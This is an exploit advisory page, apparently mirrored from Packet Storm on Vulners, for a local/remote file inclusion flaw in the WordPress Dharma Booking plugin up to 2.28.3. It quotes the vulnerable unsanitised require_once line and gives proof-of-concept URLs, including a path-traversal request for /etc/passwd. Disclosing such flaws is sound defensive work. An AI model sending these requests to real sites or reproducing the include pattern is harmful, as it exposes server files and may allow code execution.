Lucene search
K

WordPress Dharma Booking 2.28.3 Remote / Local File Inclusion

🗓️ 23 Mar 2016 00:00:00Reported by AMAR^SHGType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 20 Views

WordPress Dharma Booking 2.28.3 File Inclusion Vulnerabilit

Code
`# Exploit Title: Wordpress Dharma booking File Inclusion  
  
# Date: 03/22/2016  
  
# Exploit Author: AMAR^SHG  
  
# Vendor Homepage:https://wordpress.org/plugins/dharma-booking/  
  
<https://webcache.googleusercontent.com/search?q=cache:1BjMckAC9HkJ:https://wordpress.org/plugins/dharma-booking/+&cd=2&hl=fr&ct=clnk&gl=fr>Software  
Link : https://wordpress.org/plugins/dharma-booking/  
  
# Version: <=2.28.3  
  
# Tested on: WINDOWS/WAMP  
  
  
dharma-booking/frontend/ajax/gateways/proccess.php's code:  
<?php  
include_once('../../../../../../wp-config.php');  
$settings = get_option('Dharma_Vars');  
echo $settings['paymentAccount']. $settings['gatewayid'];  
require_once($_GET['gateway'].'.php');  
//  
POC:  
http://localhost/wp/dharma-booking/frontend/ajax/gateways/proccess.php?gateway=LFI/RFI  
http://localhost/wp/dharma-booking/frontend/ajax/gateways/proccess.php?gateway=../../../../../../etc/passwd%00  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Mar 2016 00:00Current
7.4High risk
Vulners AI Score7.4
20